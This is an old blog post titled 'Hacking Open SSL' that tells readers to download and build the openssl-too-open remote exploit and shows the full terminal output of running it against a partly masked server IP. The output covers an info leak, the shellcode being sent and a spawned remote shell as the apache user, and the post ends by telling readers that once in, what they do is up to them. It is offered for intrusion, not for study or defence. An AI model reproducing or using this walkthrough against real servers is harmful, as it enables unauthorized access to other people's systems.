.:My Black Corner:.

Monday, February 19, 2007

Hacking Open SSL

Steps to follow:
1. Download openssl-too-open.tar.gz; you can get it from anywhere, it's up to you...
2. Extract the file.
3. Then run configure and make, and it is ready to use.

The first thing you have to do is scan the target server to see whether it is vulnerable. If it is vulnerable, it can probably be broken into.
Below is the output from a server that was broken into:

$ ./ssl -a 0x08 -v 2xx.xx.xx.xx
: openssl-too-open : OpenSSL remote exploit
Modified by xxx

: Opening 30 connections
Establishing SSL connections

-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x8324180
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x8324180
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x8324180

: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x8324180 start_addr: 0x83240c0 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...

bash: no job control in this shell
bash-2.04$
bash-2.04$ uname -a; id; w;
Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
12:01am up 10 days, 8:00, 0 users, load average: 0.24, 0.22, 0.18
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.04$
bash-2.04$

Once you're in, it's up to you what to do with it :p
Source: From a hick, backwoods guy who comes from a clan that is dangerous to mention by name (my blog might get defaced). Sorry I'm not saying where you come from, bro..! But ur still in my heart... (ptui).


posted by .:CyberColombuzz:. at 9:37 AM
